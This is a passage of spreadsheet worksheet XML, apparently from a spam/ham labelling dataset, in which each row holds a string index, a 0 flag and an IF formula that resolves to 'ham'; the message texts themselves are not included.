    <row r="4206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4206" t="s">
        <v>3568</v>
      </c>
      <c r="B4206">
        <v>0</v>
      </c>
      <c r="C4206" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4207" t="s">
        <v>3569</v>
      </c>
      <c r="B4207">
        <v>0</v>
      </c>
      <c r="C4207" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4208" t="s">
        <v>3570</v>
      </c>
      <c r="B4208">
        <v>0</v>
      </c>
      <c r="C4208" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4209" t="s">
        <v>3571</v>
      </c>
      <c r="B4209">
        <v>0</v>
      </c>
      <c r="C4209" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4210" t="s">
        <v>3572</v>
      </c>
      <c r="B4210">
        <v>0</v>
      </c>
      <c r="C4210" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4211" t="s">
        <v>3573</v>
      </c>
      <c r="B4211">
        <v>0</v>
      </c>
      <c r="C4211" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4212" t="s">
        <v>3574</v>
      </c>
      <c r="B4212">
        <v>0</v>
      </c>
      <c r="C4212" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4213" t="s">
        <v>3575</v>
      </c>
      <c r="B4213">
        <v>0</v>
      </c>
      <c r="C4213" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4214" t="s">
        <v>3576</v>
      </c>
      <c r="B4214">
        <v>0</v>
      </c>
      <c r="C4214" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4215" t="s">
        <v>3577</v>
      </c>
      <c r="B4215">
        <v>0</v>
      </c>
      <c r="C4215" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4216" t="s">
        <v>3578</v>
      </c>
      <c r="B4216">
        <v>0</v>
      </c>
      <c r="C4216" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4217" t="s">
        <v>3579</v>
      </c>
      <c r="B4217">
        <v>0</v>
      </c>
      <c r="C4217" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4218" t="s">
        <v>3580</v>
      </c>
      <c r="B4218">
        <v>0</v>
      </c>
      <c r="C4218" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4219" t="s">
        <v>3581</v>
      </c>
      <c r="B4219">
        <v>0</v>
      </c>
      <c r="C4219" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4220" t="s">
        <v>3582</v>
      </c>
      <c r="B4220">
        <v>0</v>
      </c>
      <c r="C4220" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4221" t="s">
        <v>3583</v>
      </c>
      <c r="B4221">
        <v>0</v>
      </c>
      <c r="C4221" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4222" t="s">
        <v>3584</v>
      </c>
      <c r="B4222">
        <v>0</v>
      </c>
      <c r="C4222" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4223" t="s">
        <v>3585</v>
      </c>
      <c r="B4223">
        <v>0</v>
      </c>
      <c r="C4223" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4224" t="s">
        <v>3586</v>
      </c>
      <c r="B4224">
        <v>0</v>
      </c>
      <c r="C4224" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4225" t="s">
        <v>3587</v>
      </c>
      <c r="B4225">
        <v>0</v>
      </c>
      <c r="C4225" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4226" t="s">
        <v>3588</v>
      </c>
      <c r="B4226">
        <v>0</v>
      </c>
      <c r="C4226" t="str">
        <f t="shared" ref="C4226:C4289" si="66">IF(B4226="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4227" t="s">
        <v>3589</v>
      </c>
      <c r="B4227">
        <v>0</v>
      </c>
      <c r="C4227" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4228" t="s">
        <v>3590</v>
      </c>
      <c r="B4228">
        <v>0</v>
      </c>
      <c r="C4228" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4229" t="s">
        <v>3591</v>
      </c>
      <c r="B4229">
        <v>0</v>
      </c>
      <c r="C4229" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4230" t="s">
        <v>3592</v>
      </c>
      <c r="B4230">
        <v>0</v>
      </c>
      <c r="C4230" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4231" t="s">
        <v>3593</v>
      </c>
      <c r="B4231">
        <v>0</v>
      </c>
      <c r="C4231" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4232" t="s">
        <v>3594</v>
      </c>
      <c r="B4232">
        <v>0</v>
      </c>
      <c r="C4232" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4233" t="s">
        <v>3595</v>
      </c>
      <c r="B4233">
        <v>0</v>
      </c>
      <c r="C4233" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4234" t="s">
        <v>3596</v>
      </c>
      <c r="B4234">
        <v>0</v>
      </c>
      <c r="C4234" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4235" t="s">
        <v>3597</v>
      </c>
      <c r="B4235">
        <v>0</v>
      </c>
      <c r="C4235" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4236" t="s">
        <v>3598</v>
      </c>
      <c r="B4236">
        <v>0</v>
      </c>
      <c r="C4236" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4237" t="s">
        <v>3599</v>
      </c>
      <c r="B4237">
        <v>0</v>
      </c>
      <c r="C4237" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4238" t="s">
        <v>3600</v>
      </c>
      <c r="B4238">
        <v>0</v>
      </c>
      <c r="C4238" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4239" t="s">
        <v>3601</v>
      </c>
      <c r="B4239">
        <v>0</v>
      </c>
      <c r="C4239" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4240" t="s">
        <v>3602</v>
      </c>
      <c r="B4240">
        <v>0</v>
      </c>
      <c r="C4240" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4241" t="s">
        <v>3603</v>
      </c>
      <c r="B4241">
        <v>0</v>
      </c>
      <c r="C4241" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4242" t="s">
        <v>3604</v>
      </c>
      <c r="B4242">
        <v>0</v>
      </c>
      <c r="C4242" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4243" t="s">
        <v>3605</v>
      </c>
      <c r="B4243">
        <v>0</v>
      </c>
      <c r="C4243" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4244" t="s">
        <v>3606</v>
      </c>
      <c r="B4244">
        <v>0</v>
      </c>
      <c r="C4244" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4245" t="s">
        <v>3607</v>
      </c>
      <c r="B4245">
        <v>0</v>
      </c>
      <c r="C4245" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4246" t="s">
        <v>3608</v>
      </c>
      <c r="B4246">
        <v>0</v>
      </c>
      <c r="C4246" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4247" t="s">
        <v>3609</v>
      </c>
      <c r="B4247">
        <v>0</v>
      </c>
      <c r="C4247" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4248" t="s">
        <v>3610</v>
      </c>
      <c r="B4248">
        <v>0</v>
      </c>
      <c r="C4248" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4249" t="s">
        <v>3611</v>
      </c>
      <c r="B4249">
        <v>0</v>
      </c>
      <c r="C4249" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4250" t="s">
        <v>3612</v>
      </c>
      <c r="B4250">
        <v>0</v>
      </c>
      <c r="C4250" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4251" t="s">
        <v>3613</v>
      </c>
      <c r="B4251">
        <v>0</v>
      </c>
      <c r="C4251" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4252" t="s">
        <v>3614</v>
      </c>
      <c r="B4252">
        <v>0</v>
      </c>
      <c r="C4252" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4253" t="s">
        <v>3615</v>
      </c>
      <c r="B4253">
        <v>0</v>
      </c>
      <c r="C4253" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4254" t="s">
        <v>3616</v>
      </c>
      <c r="B4254">
        <v>0</v>
      </c>
      <c r="C4254" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4255" t="s">
        <v>3617</v>
      </c>
      <c r="B4255">
        <v>0</v>
      </c>
      <c r="C4255" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4256" t="s">
        <v>3618</v>
      </c>
      <c r="B4256">
        <v>0</v>
      </c>
      <c r="C4256" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4257" t="s">
        <v>3619</v>
      </c>
      <c r="B4257">
        <v>0</v>
      </c>
      <c r="C4257" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4258" t="s">
        <v>3620</v>
      </c>
      <c r="B4258">
        <v>0</v>
      </c>
      <c r="C4258" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4259" t="s">
        <v>3621</v>
      </c>
      <c r="B4259">
        <v>0</v>
      </c>
      <c r="C4259" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4260" t="s">
        <v>3622</v>
      </c>
      <c r="B4260">
        <v>0</v>
      </c>
      <c r="C4260" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4261" t="s">
        <v>3623</v>
      </c>
      <c r="B4261">
        <v>0</v>
      </c>
      <c r="C4261" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4262" t="s">
        <v>3624</v>
      </c>
      <c r="B4262">
        <v>0</v>
      </c>
      <c r="C4262" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4263" t="s">
        <v>3625</v>
      </c>
      <c r="B4263">
        <v>0</v>
      </c>
      <c r="C4263" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4264" t="s">
        <v>3626</v>
      </c>
      <c r="B4264">
        <v>0</v>
      </c>
      <c r="C4264" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4265" t="s">
        <v>3627</v>
      </c>
      <c r="B4265">
        <v>0</v>
      </c>
      <c r="C4265" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4266" t="s">
        <v>3628</v>
      </c>
      <c r="B4266">
        <v>0</v>
      </c>
      <c r="C4266" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4267" t="s">
        <v>3629</v>
      </c>
      <c r="B4267">
        <v>0</v>
      </c>
      <c r="C4267" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4268" t="s">
        <v>3630</v>
      </c>
      <c r="B4268">
        <v>0</v>
      </c>
      <c r="C4268" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4269" t="s">
        <v>3631</v>
      </c>
      <c r="B4269">
        <v>0</v>
      </c>
      <c r="C4269" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4270" t="s">
        <v>3632</v>
      </c>
      <c r="B4270">
        <v>0</v>
      </c>
      <c r="C4270" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4271" t="s">
        <v>3633</v>
      </c>
      <c r="B4271">
        <v>0</v>
      </c>
      <c r="C4271" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4272" t="s">
        <v>3634</v>
      </c>
      <c r="B4272">
        <v>0</v>
      </c>
      <c r="C4272" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4273" t="s">
        <v>3635</v>
      </c>
      <c r="B4273">
        <v>0</v>
      </c>
      <c r="C4273" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4274" t="s">
        <v>3636</v>
      </c>
      <c r="B4274">
        <v>0</v>
      </c>
      <c r="C4274" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4275" t="s">
        <v>3637</v>
      </c>
      <c r="B4275">
        <v>0</v>
      </c>
      <c r="C4275" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4276" t="s">
        <v>3638</v>
      </c>
      <c r="B4276">
        <v>0</v>
      </c>
      <c r="C4276" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4277" t="s">
        <v>3639</v>
      </c>
      <c r="B4277">
        <v>0</v>
      </c>
      <c r="C4277" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4278" t="s">
        <v>3640</v>
      </c>
      <c r="B4278">
        <v>0</v>
      </c>
      <c r="C4278" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4279" t="s">
        <v>3641</v>
      </c>
      <c r="B4279">
        <v>0</v>
      </c>
      <c r="C4279" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4280" t="s">
        <v>3642</v>
      </c>
      <c r="B4280">
        <v>0</v>
      </c>
      <c r="C4280" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4281" t="s">
        <v>3643</v>
      </c>
      <c r="B4281">
        <v>0</v>
      </c>
      <c r="C4281" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4282" t="s">
        <v>3644</v>
      </c>
      <c r="B4282">
        <v>0</v>
      </c>
      <c r="C4282" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4283" t="s">
        <v>3645</v>
      </c>
      <c r="B4283">
        <v>0</v>
      </c>
      <c r="C4283" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4284" t="s">
        <v>3646</v>
      </c>
      <c r="B4284">
        <v>0</v>
      </c>
      <c r="C4284" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4285" t="s">
        <v>3647</v>
      </c>
      <c r="B4285">
        <v>0</v>
      </c>
      <c r="C4285" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4286" t="s">
        <v>3648</v>
      </c>
      <c r="B4286">
        <v>0</v>
      </c>
      <c r="C4286" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4287" t="s">
        <v>3649</v>
      </c>
      <c r="B4287">
        <v>0</v>
      </c>
      <c r="C4287" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4288" t="s">
        <v>3650</v>
      </c>
      <c r="B4288">
        <v>0</v>
      </c>
      <c r="C4288" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4289" t="s">
        <v>3651</v>
      </c>
      <c r="B4289">
        <v>0</v>
      </c>
      <c r="C4289" t="str">
        <f t="shared" si="66"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4290" t="s">
        <v>3652</v>
      </c>
      <c r="B4290">
        <v>0</v>
      </c>
      <c r="C4290" t="str">
        <f t="shared" ref="C4290:C4353" si="67">IF(B4290="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4291" t="s">
        <v>3653</v>
      </c>
      <c r="B4291">
        <v>0</v>
      </c>
      <c r="C4291" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4292" t="s">
        <v>3654</v>
      </c>
      <c r="B4292">
        <v>0</v>
      </c>
      <c r="C4292" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4293" t="s">
        <v>3655</v>
      </c>
      <c r="B4293">
        <v>0</v>
      </c>
      <c r="C4293" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4294" t="s">
        <v>3656</v>
      </c>
      <c r="B4294">
        <v>0</v>
      </c>
      <c r="C4294" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4295" t="s">
        <v>3657</v>
      </c>
      <c r="B4295">
        <v>0</v>
      </c>
      <c r="C4295" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4296" t="s">
        <v>3658</v>
      </c>
      <c r="B4296">
        <v>0</v>
      </c>
      <c r="C4296" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4297" t="s">
        <v>3659</v>
      </c>
      <c r="B4297">
        <v>0</v>
      </c>
      <c r="C4297" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4298" t="s">
        <v>3660</v>
      </c>
      <c r="B4298">
        <v>0</v>
      </c>
      <c r="C4298" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4299" t="s">
        <v>3661</v>
      </c>
      <c r="B4299">
        <v>0</v>
      </c>
      <c r="C4299" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4300" t="s">
        <v>3662</v>
      </c>
      <c r="B4300">
        <v>0</v>
      </c>
      <c r="C4300" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4301" t="s">
        <v>3663</v>
      </c>
      <c r="B4301">
        <v>0</v>
      </c>
      <c r="C4301" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4302" t="s">
        <v>3664</v>
      </c>
      <c r="B4302">
        <v>0</v>
      </c>
      <c r="C4302" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4303" t="s">
        <v>3665</v>
      </c>
      <c r="B4303">
        <v>0</v>
      </c>
      <c r="C4303" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4304" t="s">
        <v>3666</v>
      </c>
      <c r="B4304">
        <v>0</v>
      </c>
      <c r="C4304" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4305" t="s">
        <v>3667</v>
      </c>
      <c r="B4305">
        <v>0</v>
      </c>
      <c r="C4305" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4306" t="s">
        <v>3668</v>
      </c>
      <c r="B4306">
        <v>0</v>
      </c>
      <c r="C4306" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4307" t="s">
        <v>3669</v>
      </c>
      <c r="B4307">
        <v>0</v>
      </c>
      <c r="C4307" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4308" t="s">
        <v>3670</v>
      </c>
      <c r="B4308">
        <v>0</v>
      </c>
      <c r="C4308" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4309" t="s">
        <v>3671</v>
      </c>
      <c r="B4309">
        <v>0</v>
      </c>
      <c r="C4309" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4310" t="s">
        <v>3672</v>
      </c>
      <c r="B4310">
        <v>0</v>
      </c>
      <c r="C4310" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4311" t="s">
        <v>3673</v>
      </c>
      <c r="B4311">
        <v>0</v>
      </c>
      <c r="C4311" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4312" t="s">
        <v>3674</v>
      </c>
      <c r="B4312">
        <v>0</v>
      </c>
      <c r="C4312" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4313" t="s">
        <v>3675</v>
      </c>
      <c r="B4313">
        <v>0</v>
      </c>
      <c r="C4313" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4314" t="s">
        <v>3676</v>
      </c>
      <c r="B4314">
        <v>0</v>
      </c>
      <c r="C4314" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4315" t="s">
        <v>3677</v>
      </c>
      <c r="B4315">
        <v>0</v>
      </c>
      <c r="C4315" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4316" t="s">
        <v>3678</v>
      </c>
      <c r="B4316">
        <v>0</v>
      </c>
      <c r="C4316" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4317" t="s">
        <v>3679</v>
      </c>
      <c r="B4317">
        <v>0</v>
      </c>
      <c r="C4317" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4318" t="s">
